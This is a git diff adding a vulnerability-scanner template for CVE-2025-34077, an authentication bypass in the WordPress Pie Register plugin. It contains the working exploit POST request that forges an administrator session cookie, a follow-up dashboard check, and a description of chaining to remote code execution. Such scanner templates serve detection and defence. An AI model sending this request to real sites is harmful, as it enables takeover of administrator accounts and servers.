diff --git a/http/cves/2025/CVE-2025-34077.yaml b/http/cves/2025/CVE-2025-34077.yaml new file mode 100644 index 000000000000..085f1d7360b9 --- /dev/null +++ b/http/cves/2025/CVE-2025-34077.yaml @@ -0,0 +1,48 @@ +id: CVE-2025-34077 + +info: + name: WordPress Pie Register <= 3.7.1.4 - Authentication Bypass + author: kylew1004 + severity: critical + description: | + An authentication bypass vulnerability exists in the WordPress Pie Register plugin ≤ 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators.Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server. + reference: + - https://github.com/MrjHaxcore/CVE-2025-34077 + - https://nvd.nist.gov/vuln/detail/CVE-2025-34077 + - https://securityvulnerability.io/vulnerability/CVE-2025-34077 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/pie-register/" + tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null + + matchers: + - type: dsl + dsl: + - "contains(set_cookie,'wordpress_logged_in_')" + - "status_code==302" + condition: and + internal: true + + - raw: + - | + POST /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + + redirects: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "Dashboard","Plugins","Edit Profile")' + condition: and